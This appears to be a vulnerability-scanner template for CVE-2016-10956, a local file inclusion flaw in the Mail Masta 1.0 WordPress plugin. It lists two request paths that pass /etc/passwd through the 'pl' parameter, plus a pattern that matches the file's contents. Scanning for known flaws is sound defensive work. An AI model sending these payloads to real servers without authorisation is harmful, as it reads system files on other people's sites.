id: CVE-2016-10956 info: name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) author: daffainfo,0x240x23elu severity: high description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. reference: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 tags: cve,cve2016,wordpress,wp-plugin,lfi,mail requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: status status: - 200 - 500